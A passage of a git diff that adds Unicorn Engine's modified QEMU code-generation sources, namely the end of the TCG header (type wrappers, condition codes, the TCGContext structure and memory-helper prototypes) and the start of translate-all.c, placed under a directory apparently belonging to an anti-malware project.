*/ + +typedef struct TCGv_i32_d *TCGv_i32; +typedef struct TCGv_i64_d *TCGv_i64; +typedef struct TCGv_ptr_d *TCGv_ptr; + +static inline TCGv_i32 QEMU_ARTIFICIAL MAKE_TCGV_I32(intptr_t i) +{ + return (TCGv_i32)i; +} + +static inline TCGv_i64 QEMU_ARTIFICIAL MAKE_TCGV_I64(intptr_t i) +{ + return (TCGv_i64)i; +} + +static inline TCGv_ptr QEMU_ARTIFICIAL MAKE_TCGV_PTR(intptr_t i) +{ + return (TCGv_ptr)i; +} + +static inline intptr_t QEMU_ARTIFICIAL GET_TCGV_I32(TCGv_i32 t) +{ + return (intptr_t)t; +} + +static inline intptr_t QEMU_ARTIFICIAL GET_TCGV_I64(TCGv_i64 t) +{ + return (intptr_t)t; +} + +static inline intptr_t QEMU_ARTIFICIAL GET_TCGV_PTR(TCGv_ptr t) +{ + return (intptr_t)t; +} + +#if TCG_TARGET_REG_BITS == 32 +#define TCGV_LOW(t) MAKE_TCGV_I32(GET_TCGV_I64(t)) +#define TCGV_HIGH(t) MAKE_TCGV_I32(GET_TCGV_I64(t) + 1) +#endif + +#define TCGV_EQUAL_I32(a, b) (GET_TCGV_I32(a) == GET_TCGV_I32(b)) +#define TCGV_EQUAL_I64(a, b) (GET_TCGV_I64(a) == GET_TCGV_I64(b)) +#define TCGV_EQUAL_PTR(a, b) (GET_TCGV_PTR(a) == GET_TCGV_PTR(b)) + +/* Dummy definition to avoid compiler warnings. */ +#define TCGV_UNUSED_I32(x) x = MAKE_TCGV_I32(-1) +#define TCGV_UNUSED_I64(x) x = MAKE_TCGV_I64(-1) +#define TCGV_UNUSED_PTR(x) x = MAKE_TCGV_PTR(-1) + +#define TCGV_IS_UNUSED_I32(x) (GET_TCGV_I32(x) == -1) +#define TCGV_IS_UNUSED_I64(x) (GET_TCGV_I64(x) == -1) +#define TCGV_IS_UNUSED_PTR(x) (GET_TCGV_PTR(x) == -1) + +/* call flags */ +/* Helper does not read globals (either directly or through an exception). It + implies TCG_CALL_NO_WRITE_GLOBALS. */ +#define TCG_CALL_NO_READ_GLOBALS 0x0010 +/* Helper does not write globals */ +#define TCG_CALL_NO_WRITE_GLOBALS 0x0020 +/* Helper can be safely suppressed if the return value is not used. 
*/ +#define TCG_CALL_NO_SIDE_EFFECTS 0x0040 + +/* convenience version of most used call flags */ +#define TCG_CALL_NO_RWG TCG_CALL_NO_READ_GLOBALS +#define TCG_CALL_NO_WG TCG_CALL_NO_WRITE_GLOBALS +#define TCG_CALL_NO_SE TCG_CALL_NO_SIDE_EFFECTS +#define TCG_CALL_NO_RWG_SE (TCG_CALL_NO_RWG | TCG_CALL_NO_SE) +#define TCG_CALL_NO_WG_SE (TCG_CALL_NO_WG | TCG_CALL_NO_SE) + +/* used to align parameters */ +#define TCG_CALL_DUMMY_TCGV MAKE_TCGV_I32(-1) +#define TCG_CALL_DUMMY_ARG ((TCGArg)(-1)) + +/* Conditions. Note that these are laid out for easy manipulation by + the functions below: + bit 0 is used for inverting; + bit 1 is signed, + bit 2 is unsigned, + bit 3 is used with bit 0 for swapping signed/unsigned. */ +typedef enum { + /* non-signed */ + TCG_COND_NEVER = 0 | 0 | 0 | 0, + TCG_COND_ALWAYS = 0 | 0 | 0 | 1, + TCG_COND_EQ = 8 | 0 | 0 | 0, + TCG_COND_NE = 8 | 0 | 0 | 1, + /* signed */ + TCG_COND_LT = 0 | 0 | 2 | 0, + TCG_COND_GE = 0 | 0 | 2 | 1, + TCG_COND_LE = 8 | 0 | 2 | 0, + TCG_COND_GT = 8 | 0 | 2 | 1, + /* unsigned */ + TCG_COND_LTU = 0 | 4 | 0 | 0, + TCG_COND_GEU = 0 | 4 | 0 | 1, + TCG_COND_LEU = 8 | 4 | 0 | 0, + TCG_COND_GTU = 8 | 4 | 0 | 1, +} TCGCond; + +/* Invert the sense of the comparison. */ +static inline TCGCond tcg_invert_cond(TCGCond c) +{ + return (TCGCond)(c ^ 1); +} + +/* Swap the operands in a comparison. */ +static inline TCGCond tcg_swap_cond(TCGCond c) +{ + return c & 6 ? (TCGCond)(c ^ 9) : c; +} + +/* Create an "unsigned" version of a "signed" comparison. */ +static inline TCGCond tcg_unsigned_cond(TCGCond c) +{ + return c & 2 ? (TCGCond)(c ^ 6) : c; +} + +/* Must a comparison be considered unsigned? */ +static inline bool is_unsigned_cond(TCGCond c) +{ + return (c & 4) != 0; +} + +/* Create a "high" version of a double-word comparison. + This removes equality from a LTE or GTE comparison. 
*/ +static inline TCGCond tcg_high_cond(TCGCond c) +{ + switch (c) { + case TCG_COND_GE: + case TCG_COND_LE: + case TCG_COND_GEU: + case TCG_COND_LEU: + return (TCGCond)(c ^ 8); + default: + return c; + } +} + +#define TEMP_VAL_DEAD 0 +#define TEMP_VAL_REG 1 +#define TEMP_VAL_MEM 2 +#define TEMP_VAL_CONST 3 + +/* XXX: optimize memory layout */ +typedef struct TCGTemp { + TCGType base_type; + TCGType type; + int val_type; + int reg; + tcg_target_long val; + int mem_reg; + intptr_t mem_offset; + unsigned int fixed_reg:1; + unsigned int mem_coherent:1; + unsigned int mem_allocated:1; + unsigned int temp_local:1; /* If true, the temp is saved across + basic blocks. Otherwise, it is not + preserved across basic blocks. */ + unsigned int temp_allocated:1; /* never used for code gen */ + const char *name; +} TCGTemp; + +typedef struct TCGContext TCGContext; + +typedef struct TCGTempSet { + unsigned long l[BITS_TO_LONGS(TCG_MAX_TEMPS)]; +} TCGTempSet; + + +/* pool based memory allocation */ + +void *tcg_malloc_internal(TCGContext *s, int size); +void tcg_pool_reset(TCGContext *s); +void tcg_pool_delete(TCGContext *s); + +void tcg_context_init(TCGContext *s); +void tcg_context_free(void *s); // free memory allocated for @s +void tcg_prologue_init(TCGContext *s); +void tcg_func_start(TCGContext *s); + +int tcg_gen_code(TCGContext *s, tcg_insn_unit *gen_code_buf); +int tcg_gen_code_search_pc(TCGContext *s, tcg_insn_unit *gen_code_buf, + long offset); + +void tcg_set_frame(TCGContext *s, int reg, intptr_t start, intptr_t size); + +TCGv_i32 tcg_global_reg_new_i32(TCGContext *s, int reg, const char *name); +TCGv_i32 tcg_global_mem_new_i32(TCGContext *s, int reg, intptr_t offset, const char *name); +TCGv_i32 tcg_temp_new_internal_i32(TCGContext *s, int temp_local); +static inline TCGv_i32 tcg_temp_new_i32(TCGContext *s) +{ + return tcg_temp_new_internal_i32(s, 0); +} +static inline TCGv_i32 tcg_temp_local_new_i32(TCGContext *s) +{ + return tcg_temp_new_internal_i32(s, 1); +} 
+void tcg_temp_free_i32(TCGContext *s, TCGv_i32 arg); +char *tcg_get_arg_str_i32(TCGContext *s, char *buf, int buf_size, TCGv_i32 arg); + +TCGv_i64 tcg_global_reg_new_i64(TCGContext *s, int reg, const char *name); +TCGv_i64 tcg_global_mem_new_i64(TCGContext *s, int reg, intptr_t offset, const char *name); +TCGv_i64 tcg_temp_new_internal_i64(TCGContext *s, int temp_local); +static inline TCGv_i64 tcg_temp_new_i64(TCGContext *s) +{ + return tcg_temp_new_internal_i64(s, 0); +} +static inline TCGv_i64 tcg_temp_local_new_i64(TCGContext *s) +{ + return tcg_temp_new_internal_i64(s, 1); +} +void tcg_temp_free_i64(TCGContext *s, TCGv_i64 arg); +char *tcg_get_arg_str_i64(TCGContext *s, char *buf, int buf_size, TCGv_i64 arg); + +#if defined(CONFIG_DEBUG_TCG) +/* If you call tcg_clear_temp_count() at the start of a section of + * code which is not supposed to leak any TCG temporaries, then + * calling tcg_check_temp_count() at the end of the section will + * return 1 if the section did in fact leak a temporary. + */ +void tcg_clear_temp_count(void); +int tcg_check_temp_count(void); +#else +#define tcg_clear_temp_count() do { } while (0) +#define tcg_check_temp_count() 0 +#endif + +void tcg_dump_info(FILE *f, fprintf_function cpu_fprintf); + +#define TCG_CT_ALIAS 0x80 +#define TCG_CT_IALIAS 0x40 +#define TCG_CT_REG 0x01 +#define TCG_CT_CONST 0x02 /* any constant of register size */ + +typedef struct TCGArgConstraint { + uint16_t ct; + uint8_t alias_index; + union { + TCGRegSet regs; + } u; +} TCGArgConstraint; + +#define TCG_MAX_OP_ARGS 16 + +/* Bits for TCGOpDef->flags, 8 bits available. */ +enum { + /* Instruction defines the end of a basic block. */ + TCG_OPF_BB_END = 0x01, + /* Instruction clobbers call registers and potentially update globals. */ + TCG_OPF_CALL_CLOBBER = 0x02, + /* Instruction has side effects: it cannot be removed if its outputs + are not used, and might trigger exceptions. 
*/
    TCG_OPF_SIDE_EFFECTS = 0x04,
    /* Instruction operands are 64-bits (otherwise 32-bits). */
    TCG_OPF_64BIT = 0x08,
    /* Instruction is optional and not implemented by the host, or insn
       is generic and should not be implemented by the host. */
    TCG_OPF_NOT_PRESENT = 0x10,
};

/* Static description of one TCG opcode (table indexed by TCGOpcode). */
typedef struct TCGOpDef {
    const char *name;
    uint8_t nb_oargs, nb_iargs, nb_cargs, nb_args; /* output / input / constant
                                                      / total argument counts */
    uint8_t flags;              /* combination of TCG_OPF_* bits above */
    TCGArgConstraint *args_ct;  /* per-argument register constraints */
    int *sorted_args;           /* argument order used by register allocation */
#if defined(CONFIG_DEBUG_TCG)
    int used;
#endif
} TCGOpDef;

/* What the optimizer currently knows about a temp's value. */
typedef enum {
    TCG_TEMP_UNDEF = 0,   /* nothing known */
    TCG_TEMP_CONST,       /* temp holds the known constant 'val' */
    TCG_TEMP_COPY,        /* temp is a copy of another temp */
} tcg_temp_state;

/* Per-temp bookkeeping for the optimizer (TCGContext.temps2). */
struct tcg_temp_info {
    tcg_temp_state state;
    uint16_t prev_copy;       /* links in the ring of temps sharing one value */
    uint16_t next_copy;
    tcg_target_ulong val;     /* constant value when state == TCG_TEMP_CONST */
    tcg_target_ulong mask;    /* bits that may be nonzero in the value */
};

struct TCGContext {
    uint8_t *pool_cur, *pool_end;
    TCGPool *pool_first, *pool_current, *pool_first_large;
    TCGLabel *labels;
    int nb_labels;
    int nb_globals;
    int nb_temps;

    /* goto_tb support */
    tcg_insn_unit *code_buf;
    uintptr_t *tb_next;
    uint16_t *tb_next_offset;
    uint16_t *tb_jmp_offset; /* != NULL if USE_DIRECT_JUMP */

    /* liveness analysis */
    uint16_t *op_dead_args; /* for each operation, each bit tells if the
                               corresponding argument is dead */
    uint8_t *op_sync_args;  /* for each operation, each bit tells if the
                               corresponding output argument needs to be
                               synced to memory. */

    /* tells in which temporary a given register is. 
It does not take + into account fixed registers */ + int reg_to_temp[TCG_TARGET_NB_REGS]; + TCGRegSet reserved_regs; + intptr_t current_frame_offset; + intptr_t frame_start; + intptr_t frame_end; + int frame_reg; + + tcg_insn_unit *code_ptr; + TCGTemp temps[TCG_MAX_TEMPS]; /* globals first, temps after */ + TCGTempSet free_temps[TCG_TYPE_COUNT * 2]; + + GHashTable *helpers; + +#ifdef CONFIG_PROFILER + /* profiling info */ + int64_t tb_count1; + int64_t tb_count; + int64_t op_count; /* total insn count */ + int op_count_max; /* max insn per TB */ + int64_t temp_count; + int temp_count_max; + int64_t del_op_count; + int64_t code_in_len; + int64_t code_out_len; + int64_t interm_time; + int64_t code_time; + int64_t la_time; + int64_t opt_time; + int64_t restore_count; + int64_t restore_time; +#endif + +#ifdef CONFIG_DEBUG_TCG + int temps_in_use; + int goto_tb_issue_mask; +#endif + + uint16_t gen_opc_buf[OPC_BUF_SIZE]; + TCGArg gen_opparam_buf[OPPARAM_BUF_SIZE]; + + uint16_t *gen_opc_ptr; + TCGArg *gen_opparam_ptr; + target_ulong gen_opc_pc[OPC_BUF_SIZE]; + uint16_t gen_opc_icount[OPC_BUF_SIZE]; + uint8_t gen_opc_instr_start[OPC_BUF_SIZE]; + + /* Code generation. Note that we specifically do not use tcg_insn_unit + here, because there's too much arithmetic throughout that relies + on addition and subtraction working on bytes. Rely on the GCC + extension that allows arithmetic on void*. */ + int code_gen_max_blocks; + void *code_gen_prologue; + void *code_gen_buffer; + size_t code_gen_buffer_size; + /* threshold to flush the translated code buffer */ + size_t code_gen_buffer_max_size; + void *code_gen_ptr; + + TBContext tb_ctx; + + /* The TCGBackendData structure is private to tcg-target.c. 
*/ + struct TCGBackendData *be; + + // Unicorn engine variables + struct uc_struct *uc; + /* qemu/target-i386/translate.c: global register indexes */ + TCGv_ptr cpu_env; + TCGv_i32 cpu_cc_op; + void *cpu_regs[16]; // 16 GRP for X86-64 + int x86_64_hregs; // qemu/target-i386/translate.c + uint8_t gen_opc_cc_op[OPC_BUF_SIZE]; // qemu/target-i386/translate.c + + /* qemu/target-i386/translate.c: global TCGv vars */ + void *cpu_A0; + void *cpu_cc_dst, *cpu_cc_src, *cpu_cc_src2, *cpu_cc_srcT; + + /* qemu/target-i386/translate.c: local temps */ + void *cpu_T[2]; + + /* qemu/target-i386/translate.c: local register indexes (only used inside old micro ops) */ + void *cpu_tmp0, *cpu_tmp4; + TCGv_ptr cpu_ptr0, cpu_ptr1; + TCGv_i32 cpu_tmp2_i32, cpu_tmp3_i32; + TCGv_i64 cpu_tmp1_i64; + + /* qemu/tcg/i386/tcg-target.c */ + void *tb_ret_addr; + int guest_base_flags; + /* If bit_MOVBE is defined in cpuid.h (added in GCC version 4.6), we are + going to attempt to determine at runtime whether movbe is available. */ + bool have_movbe; + + /* qemu/tcg/tcg.c */ + uint64_t tcg_target_call_clobber_regs; + uint64_t tcg_target_available_regs[2]; + TCGOpDef *tcg_op_defs; + + /* qemu/tcg/optimize.c */ + struct tcg_temp_info temps2[TCG_MAX_TEMPS]; + + /* qemu/target-m68k/translate.c */ + TCGv_i32 cpu_halted; + char cpu_reg_names[3*8*3 + 5*4]; + void *cpu_dregs[8]; + void *cpu_aregs[8]; + TCGv_i64 cpu_fregs[8]; + TCGv_i64 cpu_macc[4]; + TCGv_i64 QREG_FP_RESULT; + void *QREG_PC, *QREG_SR, *QREG_CC_OP, *QREG_CC_DEST, *QREG_CC_SRC; + void *QREG_CC_X, *QREG_DIV1, *QREG_DIV2, *QREG_MACSR, *QREG_MAC_MASK; + void *NULL_QREG; + void *opcode_table[65536]; + /* Used to distinguish stores from bad addressing modes. */ + void *store_dummy; + + /* qemu/target-arm/translate.c */ + uint32_t gen_opc_condexec_bits[OPC_BUF_SIZE]; + TCGv_i64 cpu_V0, cpu_V1, cpu_M0; + /* We reuse the same 64-bit temporaries for efficiency. 
*/ + TCGv_i32 cpu_R[16]; + TCGv_i32 cpu_CF, cpu_NF, cpu_VF, cpu_ZF; + TCGv_i64 cpu_exclusive_addr; + TCGv_i64 cpu_exclusive_val; + TCGv_i32 cpu_F0s, cpu_F1s; + TCGv_i64 cpu_F0d, cpu_F1d; + + /* qemu/target-arm/translate-a64.c */ + TCGv_i64 cpu_pc; + /* Load/store exclusive handling */ + TCGv_i64 cpu_exclusive_high; + TCGv_i64 cpu_X[32]; + + /* qemu/target-mips/translate.c */ + /* global register indices */ + void *cpu_gpr[32], *cpu_PC; + void *cpu_HI[4], *cpu_LO[4]; // MIPS_DSP_ACC = 4 in qemu/target-mips/cpu.h + void *cpu_dspctrl, *btarget, *bcond; + TCGv_i32 hflags; + TCGv_i32 fpu_fcr31; + TCGv_i64 fpu_f64[32]; + TCGv_i64 msa_wr_d[64]; + + uint32_t gen_opc_hflags[OPC_BUF_SIZE]; + target_ulong gen_opc_btarget[OPC_BUF_SIZE]; + + /* qemu/target-sparc/translate.c */ + /* global register indexes */ + TCGv_ptr cpu_regwptr; + TCGv_i32 cpu_psr; + TCGv_i32 cpu_xcc, cpu_asi, cpu_fprs; + TCGv_i32 cpu_softint; + /* Floating point registers */ + TCGv_i64 cpu_fpr[32]; // TARGET_DPREGS = 32 for Sparc64, 16 for Sparc + + target_ulong gen_opc_npc[OPC_BUF_SIZE]; + target_ulong gen_opc_jump_pc[2]; + + // void *cpu_cc_src, *cpu_cc_src2, *cpu_cc_dst; + void *cpu_fsr, *sparc_cpu_pc, *cpu_npc, *cpu_gregs[8]; + void *cpu_y; + void *cpu_tbr; + void *cpu_cond; + void *cpu_gsr; + void *cpu_tick_cmpr, *cpu_stick_cmpr, *cpu_hstick_cmpr; + void *cpu_hintp, *cpu_htba, *cpu_hver, *cpu_ssr, *cpu_ver; + void *cpu_wim; + + int exitreq_label; // gen_tb_start() +}; + +typedef struct TCGTargetOpDef { + TCGOpcode op; + const char *args_ct_str[TCG_MAX_OP_ARGS]; +} TCGTargetOpDef; + +#define tcg_abort() \ +do {\ + fprintf(stderr, "%s:%d: tcg fatal error\n", __FILE__, __LINE__);\ + abort();\ +} while (0) + +#ifdef CONFIG_DEBUG_TCG +# define tcg_debug_assert(X) do { assert(X); } while (0) +#elif QEMU_GNUC_PREREQ(4, 5) +# define tcg_debug_assert(X) \ + do { if (!(X)) { __builtin_unreachable(); } } while (0) +#else +# define tcg_debug_assert(X) do { (void)(X); } while (0) +#endif + +void 
tcg_add_target_add_op_defs(TCGContext *s, const TCGTargetOpDef *tdefs); + +#if UINTPTR_MAX == UINT32_MAX +#define TCGV_NAT_TO_PTR(n) MAKE_TCGV_PTR(GET_TCGV_I32(n)) +#define TCGV_PTR_TO_NAT(n) MAKE_TCGV_I32(GET_TCGV_PTR(n)) + +#define tcg_const_ptr(t, V) TCGV_NAT_TO_PTR(tcg_const_i32(t, (intptr_t)(V))) +#define tcg_global_reg_new_ptr(U, R, N) \ + TCGV_NAT_TO_PTR(tcg_global_reg_new_i32(U, (R), (N))) +#define tcg_global_mem_new_ptr(t, R, O, N) \ + TCGV_NAT_TO_PTR(tcg_global_mem_new_i32(t, (R), (O), (N))) +#define tcg_temp_new_ptr(s) TCGV_NAT_TO_PTR(tcg_temp_new_i32(s)) +#define tcg_temp_free_ptr(s, T) tcg_temp_free_i32(s, TCGV_PTR_TO_NAT(T)) +#else +#define TCGV_NAT_TO_PTR(n) MAKE_TCGV_PTR(GET_TCGV_I64(n)) +#define TCGV_PTR_TO_NAT(n) MAKE_TCGV_I64(GET_TCGV_PTR(n)) + +#define tcg_const_ptr(t, V) TCGV_NAT_TO_PTR(tcg_const_i64(t, (intptr_t)(V))) +#define tcg_global_reg_new_ptr(U, R, N) \ + TCGV_NAT_TO_PTR(tcg_global_reg_new_i64(U, (R), (N))) +#define tcg_global_mem_new_ptr(t, R, O, N) \ + TCGV_NAT_TO_PTR(tcg_global_mem_new_i64(t, (R), (O), (N))) +#define tcg_temp_new_ptr(s) TCGV_NAT_TO_PTR(tcg_temp_new_i64(s)) +#define tcg_temp_free_ptr(s, T) tcg_temp_free_i64(s, TCGV_PTR_TO_NAT(T)) +#endif + +void tcg_gen_callN(TCGContext *s, void *func, + TCGArg ret, int nargs, TCGArg *args); + +void tcg_gen_shifti_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, + int c, int right, int arith); + +TCGArg *tcg_optimize(TCGContext *s, uint16_t *tcg_opc_ptr, TCGArg *args, + TCGOpDef *tcg_op_def); + +static inline void *tcg_malloc(TCGContext *s, int size) +{ + uint8_t *ptr, *ptr_end; + size = (size + sizeof(long) - 1) & ~(sizeof(long) - 1); + ptr = s->pool_cur; + ptr_end = ptr + size; + if (unlikely(ptr_end > s->pool_end)) { + return tcg_malloc_internal(s, size); + } else { + s->pool_cur = ptr_end; + return ptr; + } +} + +/* only used for debugging purposes */ +void tcg_dump_ops(TCGContext *s); + +void dump_ops(const uint16_t *opc_buf, const TCGArg *opparam_buf); +TCGv_i32 
tcg_const_i32(TCGContext *s, int32_t val); +TCGv_i64 tcg_const_i64(TCGContext *s, int64_t val); +TCGv_i32 tcg_const_local_i32(TCGContext *s, int32_t val); +TCGv_i64 tcg_const_local_i64(TCGContext *s, int64_t val); + +/** + * tcg_ptr_byte_diff + * @a, @b: addresses to be differenced + * + * There are many places within the TCG backends where we need a byte + * difference between two pointers. While this can be accomplished + * with local casting, it's easy to get wrong -- especially if one is + * concerned with the signedness of the result. + * + * This version relies on GCC's void pointer arithmetic to get the + * correct result. + */ + +static inline ptrdiff_t tcg_ptr_byte_diff(void *a, void *b) +{ + return (char*)a - (char*)b; +} + +/** + * tcg_pcrel_diff + * @s: the tcg context + * @target: address of the target + * + * Produce a pc-relative difference, from the current code_ptr + * to the destination address. + */ + +static inline ptrdiff_t tcg_pcrel_diff(TCGContext *s, void *target) +{ + return tcg_ptr_byte_diff(target, s->code_ptr); +} + +/** + * tcg_current_code_size + * @s: the tcg context + * + * Compute the current code size within the translation block. + * This is used to fill in qemu's data structures for goto_tb. + */ + +static inline size_t tcg_current_code_size(TCGContext *s) +{ + return tcg_ptr_byte_diff(s->code_ptr, s->code_buf); +} + +/** + * tcg_qemu_tb_exec: + * @env: CPUArchState * for the CPU + * @tb_ptr: address of generated code for the TB to execute + * + * Start executing code from a given translation block. + * Where translation blocks have been linked, execution + * may proceed from the given TB into successive ones. + * Control eventually returns only when some action is needed + * from the top-level loop: either control must pass to a TB + * which has not yet been directly linked, or an asynchronous + * event such as an interrupt needs handling. 
+ * + * The return value is a pointer to the next TB to execute + * (if known; otherwise zero). This pointer is assumed to be + * 4-aligned, and the bottom two bits are used to return further + * information: + * 0, 1: the link between this TB and the next is via the specified + * TB index (0 or 1). That is, we left the TB via (the equivalent + * of) "goto_tb ". The main loop uses this to determine + * how to link the TB just executed to the next. + * 2: we are using instruction counting code generation, and we + * did not start executing this TB because the instruction counter + * would hit zero midway through it. In this case the next-TB pointer + * returned is the TB we were about to execute, and the caller must + * arrange to execute the remaining count of instructions. + * 3: we stopped because the CPU's exit_request flag was set + * (usually meaning that there is an interrupt that needs to be + * handled). The next-TB pointer returned is the TB we were + * about to execute when we noticed the pending exit request. + * + * If the bottom two bits indicate an exit-via-index then the CPU + * state is correctly synchronised and ready for execution of the next + * TB (and in particular the guest PC is the address to execute next). + * Otherwise, we gave up on execution of this TB before it started, and + * the caller must fix up the CPU state by calling cpu_pc_from_tb() + * with the next-TB pointer we return. + * + * Note that TCG targets may use a different definition of tcg_qemu_tb_exec + * to this default (which just calls the prologue.code emitted by + * tcg_target_qemu_prologue()). + */ +#define TB_EXIT_MASK 3 +#define TB_EXIT_IDX0 0 +#define TB_EXIT_IDX1 1 +#define TB_EXIT_ICOUNT_EXPIRED 2 +#define TB_EXIT_REQUESTED 3 + +#if !defined(tcg_qemu_tb_exec) +# define tcg_qemu_tb_exec(env, tb_ptr) \ + ((uintptr_t (*)(void *, void *))tcg_ctx->code_gen_prologue)(env, tb_ptr) +#endif + +/* + * Memory helpers that will be used by TCG generated code. 
+ */ +#ifdef CONFIG_SOFTMMU +/* Value zero-extended to tcg register size. */ +tcg_target_ulong helper_ret_ldub_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +tcg_target_ulong helper_le_lduw_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +tcg_target_ulong helper_le_ldul_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +uint64_t helper_le_ldq_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +tcg_target_ulong helper_be_lduw_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +tcg_target_ulong helper_be_ldul_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +uint64_t helper_be_ldq_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); + +/* Value sign-extended to tcg register size. */ +tcg_target_ulong helper_ret_ldsb_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +tcg_target_ulong helper_le_ldsw_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +tcg_target_ulong helper_le_ldsl_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +tcg_target_ulong helper_be_ldsw_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +tcg_target_ulong helper_be_ldsl_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); + +void helper_ret_stb_mmu(CPUArchState *env, target_ulong addr, uint8_t val, + int mmu_idx, uintptr_t retaddr); +void helper_le_stw_mmu(CPUArchState *env, target_ulong addr, uint16_t val, + int mmu_idx, uintptr_t retaddr); +void helper_le_stl_mmu(CPUArchState *env, target_ulong addr, uint32_t val, + int mmu_idx, uintptr_t retaddr); +void helper_le_stq_mmu(CPUArchState *env, target_ulong addr, uint64_t val, + int mmu_idx, uintptr_t retaddr); +void helper_be_stw_mmu(CPUArchState *env, target_ulong addr, uint16_t val, + int mmu_idx, uintptr_t retaddr); +void 
helper_be_stl_mmu(CPUArchState *env, target_ulong addr, uint32_t val, + int mmu_idx, uintptr_t retaddr); +void helper_be_stq_mmu(CPUArchState *env, target_ulong addr, uint64_t val, + int mmu_idx, uintptr_t retaddr); + +/* Temporary aliases until backends are converted. */ +#ifdef TARGET_WORDS_BIGENDIAN +# define helper_ret_ldsw_mmu helper_be_ldsw_mmu +# define helper_ret_lduw_mmu helper_be_lduw_mmu +# define helper_ret_ldsl_mmu helper_be_ldsl_mmu +# define helper_ret_ldul_mmu helper_be_ldul_mmu +# define helper_ret_ldq_mmu helper_be_ldq_mmu +# define helper_ret_stw_mmu helper_be_stw_mmu +# define helper_ret_stl_mmu helper_be_stl_mmu +# define helper_ret_stq_mmu helper_be_stq_mmu +#else +# define helper_ret_ldsw_mmu helper_le_ldsw_mmu +# define helper_ret_lduw_mmu helper_le_lduw_mmu +# define helper_ret_ldsl_mmu helper_le_ldsl_mmu +# define helper_ret_ldul_mmu helper_le_ldul_mmu +# define helper_ret_ldq_mmu helper_le_ldq_mmu +# define helper_ret_stw_mmu helper_le_stw_mmu +# define helper_ret_stl_mmu helper_le_stl_mmu +# define helper_ret_stq_mmu helper_le_stq_mmu +#endif + +void check_exit_request(TCGContext *tcg_ctx); + +#endif /* CONFIG_SOFTMMU */ + +#endif /* TCG_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/translate-all.c b/ai_anti_malware/unicorn/unicorn-master/qemu/translate-all.c new file mode 100644 index 0000000..2deddd1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/translate-all.c @@ -0,0 +1,2013 @@ +/* + * Host code generation + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. 
+ * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#ifdef _WIN32 +#include +#include +#else +#include +#include +#endif +#include +#include +#include +#include +#include "unicorn/platform.h" + +#include "config.h" + +#include "qemu-common.h" +#define NO_CPU_IO_DEFS +#include "cpu.h" +#include "tcg.h" +#if defined(CONFIG_USER_ONLY) +#include "qemu.h" +#if defined(__FreeBSD__) || defined(__FreeBSD_kernel__) +#include +#if __FreeBSD_version >= 700104 +#define HAVE_KINFO_GETVMMAP +#define sigqueue sigqueue_freebsd /* avoid redefinition */ +#include +#include +#define _KERNEL +#include +#undef _KERNEL +#undef sigqueue +#include +#endif +#endif +#else +#include "exec/address-spaces.h" +#endif + +#include "exec/cputlb.h" +#include "translate-all.h" +#include "qemu/timer.h" + +#include "uc_priv.h" + +//#define DEBUG_TB_INVALIDATE +//#define DEBUG_FLUSH +/* make various TB consistency checks */ +//#define DEBUG_TB_CHECK + +#if !defined(CONFIG_USER_ONLY) +/* TB consistency checks only implemented for usermode emulation. */ +#undef DEBUG_TB_CHECK +#endif + +#define SMC_BITMAP_USE_THRESHOLD 10 + +typedef struct PageDesc { + /* list of TBs intersecting this ram page */ + TranslationBlock *first_tb; + /* in order to optimize self modifying code, we count the number + of lookups we do to a given page to use a bitmap */ + unsigned int code_write_count; + uint8_t *code_bitmap; +#if defined(CONFIG_USER_ONLY) + unsigned long flags; +#endif +} PageDesc; + +/* In system mode we want L1_MAP to be based on ram offsets, + while in user mode we want it to be based on virtual addresses. 
*/ +#if !defined(CONFIG_USER_ONLY) +#if HOST_LONG_BITS < TARGET_PHYS_ADDR_SPACE_BITS +# define L1_MAP_ADDR_SPACE_BITS HOST_LONG_BITS +#else +# define L1_MAP_ADDR_SPACE_BITS TARGET_PHYS_ADDR_SPACE_BITS +#endif +#else +# define L1_MAP_ADDR_SPACE_BITS TARGET_VIRT_ADDR_SPACE_BITS +#endif + +/* Size of the L2 (and L3, etc) page tables. */ +#define V_L2_BITS 10 +#define V_L2_SIZE (1 << V_L2_BITS) + +/* The bits remaining after N lower levels of page tables. */ +#define V_L1_BITS_REM \ + ((L1_MAP_ADDR_SPACE_BITS - TARGET_PAGE_BITS) % V_L2_BITS) + +#if V_L1_BITS_REM < 4 +#define V_L1_BITS (V_L1_BITS_REM + V_L2_BITS) +#else +#define V_L1_BITS V_L1_BITS_REM +#endif + +#define V_L1_SIZE ((target_ulong)1 << V_L1_BITS) + +#define V_L1_SHIFT (L1_MAP_ADDR_SPACE_BITS - TARGET_PAGE_BITS - V_L1_BITS) + +static uintptr_t qemu_real_host_page_size; +static uintptr_t qemu_host_page_size; +static uintptr_t qemu_host_page_mask; + + +static void tb_link_page(struct uc_struct *uc, TranslationBlock *tb, + tb_page_addr_t phys_pc, tb_page_addr_t phys_page2); +static TranslationBlock *tb_find_pc(struct uc_struct *uc, uintptr_t tc_ptr); + +// Unicorn: for cleaning up memory later. 
void free_code_gen_buffer(struct uc_struct *uc);

/* Allocate and initialise the per-instance TCG context. */
static void cpu_gen_init(struct uc_struct *uc)
{
